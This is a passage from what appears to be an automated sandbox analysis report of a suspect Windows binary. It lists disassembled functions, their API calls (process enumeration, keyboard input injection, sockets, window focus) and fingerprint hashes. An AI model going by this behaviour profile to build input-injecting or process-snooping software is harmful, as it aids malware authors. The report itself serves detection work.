                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 3227129158-4108050209
                                                                                                                        • Opcode ID: 1302e4f43df2d1f65a8453b22f754570f0ac5f09b56e150895bab1d063915edd
                                                                                                                        • Instruction ID: c7d871573c25bb420818d4a14f52760362fc881f762fb8be5d11e86f48b69884
                                                                                                                        • Opcode Fuzzy Hash: 1302e4f43df2d1f65a8453b22f754570f0ac5f09b56e150895bab1d063915edd
                                                                                                                        • Instruction Fuzzy Hash: FD010C31500219EEDB619F11E844FAFBFB8BF46361F1484A9F849DA151EB308A94EF21
                                                                                                                        Function 005A7803 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,005E18B0,005AA364,000000FC,?,00000000,00000000,?,?,?,005676CF,?,?,?,?,?), ref: 005A7805
                                                                                                                        • GetFocus.USER32 ref: 005A780D
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                          • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                                                                                        • SendMessageW.USER32(0151DD40,000000B0,000001BC,000001C0), ref: 005A787A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3601265619-2594219639
                                                                                                                        • Opcode ID: ce804ebf91304147ff32e00b4b346973bbdabf3e84755428d756d45709ca7d01
                                                                                                                        • Instruction ID: 10ed5ce38dfa713cc4349858b31e83064f1f2be7da34a4374797c00e1ecd8809
                                                                                                                        • Opcode Fuzzy Hash: ce804ebf91304147ff32e00b4b346973bbdabf3e84755428d756d45709ca7d01
                                                                                                                        • Instruction Fuzzy Hash: E50184316055118FC729DB28EC5CABA3FE6FF9B360F18026DE0558B2A1CB316C06CB40
                                                                                                                        Function 0056D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0056D3BF
                                                                                                                        • FreeLibrary.KERNEL32 ref: 0056D3E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                        • API String ID: 3013587201-2590602151
                                                                                                                        • Opcode ID: e9d0d174f390c45b71d9cd920f70244f378d3083ec3cd8479706207018db8902
                                                                                                                        • Instruction ID: 0b90b13ec85af04db34f9c90fd8d29fe54aa680639c52263857bdf243e7d459b
                                                                                                                        • Opcode Fuzzy Hash: e9d0d174f390c45b71d9cd920f70244f378d3083ec3cd8479706207018db8902
                                                                                                                        • Instruction Fuzzy Hash: CDF055B5F05A208BC77102115C2896D3FB0BF12701BA88D26E802EB244EB20CC44C2B2
                                                                                                                        Function 0057007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e8578f3d0aac6b0e00a43cb10c0aa0e71d98254ee7c952f1ab8b223c4d1836df
                                                                                                                        • Instruction ID: a66f30f55023ea489b0ddf1a63732a3597511ff16080eb6116a363c08c1efad8
                                                                                                                        • Opcode Fuzzy Hash: e8578f3d0aac6b0e00a43cb10c0aa0e71d98254ee7c952f1ab8b223c4d1836df
                                                                                                                        • Instruction Fuzzy Hash: 29C16D75A00216EFCB14CF94D898AAEBBF5FF48314F209598E509EB291D731DD41EB90
                                                                                                                        Function 0059342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1998397398-0
                                                                                                                        • Opcode ID: dae1b761ae26bdaec30803937eb0935ac50b18b0ef1e6974dea419d8820b2365
                                                                                                                        • Instruction ID: 668b0a821a1b4d8ff13a3f0aec4b6cc11244cac9605a81a188f9f9832a3beae0
                                                                                                                        • Opcode Fuzzy Hash: dae1b761ae26bdaec30803937eb0935ac50b18b0ef1e6974dea419d8820b2365
                                                                                                                        • Instruction Fuzzy Hash: DFA14975204201DFDB10DF28C489A6ABBE5FF8D714F058859F98A9B362DB30EE45CB91
                                                                                                                        Function 00570436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005AFC08,?), ref: 005705F0
                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005AFC08,?), ref: 00570608
                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,005ACC40,000000FF,?,00000000,00000800,00000000,?,005AFC08,?), ref: 0057062D
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0057064E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314563124-0
                                                                                                                        • Opcode ID: cad1f59382c62924ea53cf19128c96f0ab7c43fe6dfb078b7315cadeade281ed
                                                                                                                        • Instruction ID: 853643bb8abe0d859517d7a55ba91d36adbb0d36eb3dce13e5160036971bdeca
                                                                                                                        • Opcode Fuzzy Hash: cad1f59382c62924ea53cf19128c96f0ab7c43fe6dfb078b7315cadeade281ed
                                                                                                                        • Instruction Fuzzy Hash: 27811C71A00109EFCB04DF94C988DEEBBF9FF89315F108558E506AB290DB71AE06DB60
                                                                                                                        Function 00551391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 26761c60a35de7da804ddc60fd3569eb2d525dcb7c1e48995331b88ae76008bc
                                                                                                                        • Instruction ID: 45c1923008adaf492b3dc735f0795fb6801f190f85a5fd9c959c5b60691cc93d
                                                                                                                        • Opcode Fuzzy Hash: 26761c60a35de7da804ddc60fd3569eb2d525dcb7c1e48995331b88ae76008bc
                                                                                                                        • Instruction Fuzzy Hash: 1B416935A00902EBDF216BB98C5ABAF3FA4FF81371F140627FC19C6192F67448495765
                                                                                                                        Function 00591AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00591AFD
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00591B0B
                                                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00591B8A
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00591B94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$socket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1881357543-0
                                                                                                                        • Opcode ID: d386b4f7722a9fc0b3e674156dc7e61f4f639ac5e84bb701d39eff38a64f1088
                                                                                                                        • Instruction ID: ed1b5fd3ae5a4b8d786e99ed45286a4aa5f3ed9e37243dcd300ca3a35e9a8f94
                                                                                                                        • Opcode Fuzzy Hash: d386b4f7722a9fc0b3e674156dc7e61f4f639ac5e84bb701d39eff38a64f1088
                                                                                                                        • Instruction Fuzzy Hash: 2441A1346406126FEB20AF24C88AF657BE6BF85718F548448F5169F3D2D772ED828B90
                                                                                                                        Function 0054B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7603d5051b786705936bdacf40334e1075eeceb1d4241edf7a44a93e8efea392
                                                                                                                        • Instruction ID: f48dd1b68af5ac0b5d65c0a7d208a9d4479702f63bf4235af218ce3b1c1782fe
                                                                                                                        • Opcode Fuzzy Hash: 7603d5051b786705936bdacf40334e1075eeceb1d4241edf7a44a93e8efea392
                                                                                                                        • Instruction Fuzzy Hash: 2A41E675A00705AFEB249F38CC46BEABFA9FBC8714F10452AF555DB682D771D9018780
                                                                                                                        Function 005856D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00585783
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 005857A9
                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005857CE
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005857FA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3321077145-0
                                                                                                                        • Opcode ID: b56dcd06be71e784add282c570a71e1f1363500182236f832993702df914d5a6
                                                                                                                        • Instruction ID: 97622cd1184923acccc44fbc011619ff12179e0308cad823a8e074549deb3814
                                                                                                                        • Opcode Fuzzy Hash: b56dcd06be71e784add282c570a71e1f1363500182236f832993702df914d5a6
                                                                                                                        • Instruction Fuzzy Hash: 5C410839600611DFDB11EF15C449A5EBFF2BF89320B198488E84AAB362DB30FD41DB91
                                                                                                                        Function 0054D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00536D71,00000000,00000000,005382D9,?,005382D9,?,00000001,00536D71,?,00000001,005382D9,005382D9), ref: 0054D910
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0054D999
                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0054D9AB
                                                                                                                        • __freea.LIBCMT ref: 0054D9B4
                                                                                                                          • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2652629310-0
                                                                                                                        • Opcode ID: 580bf88760472203997ed1162c675482d3fdf208579fbfb91a578e2191407046
                                                                                                                        • Instruction ID: dc9ba10fea6b5aaf33a3f7abd3d426312178b81510ae4826cd85b99abcd707ec
                                                                                                                        • Opcode Fuzzy Hash: 580bf88760472203997ed1162c675482d3fdf208579fbfb91a578e2191407046
                                                                                                                        • Instruction Fuzzy Hash: 6E31A872A0020AABDF248F64DC49AEE7FB5FB41354F050169EC04D62A0EB358D54CBA0
                                                                                                                        Function 0057AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 0057ABF1
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0057AC0D
                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0057AC74
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 0057ACC6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: 70d1605154a81490c527c4639d5994a4193afb5e76bfdd890b407a326cd9d707
                                                                                                                        • Instruction ID: 48b198dd83313fb857cdd5a0f827b44f9b8d15db2bf5d32bf5664fbce874f750
                                                                                                                        • Opcode Fuzzy Hash: 70d1605154a81490c527c4639d5994a4193afb5e76bfdd890b407a326cd9d707
                                                                                                                        • Instruction Fuzzy Hash: A631E730A00618BFFF26CB65A809BFE7EA9BBC5310F04C61AF489561D1C3758D85A752
                                                                                                                        Function 005A7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 005A769A
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 005A7710
                                                                                                                        • PtInRect.USER32(?,?,005A8B89), ref: 005A7720
                                                                                                                        • MessageBeep.USER32(00000000), ref: 005A778C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1352109105-0
                                                                                                                        • Opcode ID: bca1ddb3d3754f72d57eb063424e8c0488189e73f960527e9d4657b79a9a7384
                                                                                                                        • Instruction ID: 027ccd4b9684eaa5016031f3e9ebcee76028b9eb94039745946855cd2a3821d0
                                                                                                                        • Opcode Fuzzy Hash: bca1ddb3d3754f72d57eb063424e8c0488189e73f960527e9d4657b79a9a7384
                                                                                                                        • Instruction Fuzzy Hash: 3E418738A096599FCB01CF58CC94EADBFF4FB9E300F1940A8E854DB261C730A985DB90
                                                                                                                        Function 005A16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32 ref: 005A16EB
                                                                                                                          • Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
                                                                                                                          • Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
                                                                                                                          • Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65
                                                                                                                        • GetCaretPos.USER32(?), ref: 005A16FF
                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 005A174C
                                                                                                                        • GetForegroundWindow.USER32 ref: 005A1752
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2759813231-0
                                                                                                                        • Opcode ID: 5391be74a83a66b3b512acd3c74d2ba2f998e340167ace881ce08b96ff4f5cc6
                                                                                                                        • Instruction ID: 697dcada456007c4ff9dd02e4da64457bfeb40fe9f98f048e87ef06e840727e9
                                                                                                                        • Opcode Fuzzy Hash: 5391be74a83a66b3b512acd3c74d2ba2f998e340167ace881ce08b96ff4f5cc6
                                                                                                                        • Instruction Fuzzy Hash: 50310C75D00249AFDB04EFA9C8858EEBBF9FF89304B5480A9E415A7211D6319E45CBA0
                                                                                                                        Function 0057D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0057D501
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0057D50F
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0057D52F
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0057D5DC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 420147892-0
                                                                                                                        • Opcode ID: 16d382a02c50643d4d4c996df796cf65c4b3a0b6f4f21fe1dde1722864ba01c3
                                                                                                                        • Instruction ID: 0cbd07d4ea5bc414d7b2edae0afe1046bfdd6431b579897f7af5bc7426a4cc97
                                                                                                                        • Opcode Fuzzy Hash: 16d382a02c50643d4d4c996df796cf65c4b3a0b6f4f21fe1dde1722864ba01c3
                                                                                                                        • Instruction Fuzzy Hash: 2D318D71108301AFD301EF54D885AAFBFF8BFD9344F10492DF585821A1EB719988DBA2
                                                                                                                        Function 005A8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • GetCursorPos.USER32(?), ref: 005A9001
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00567711,?,?,?,?,?), ref: 005A9016
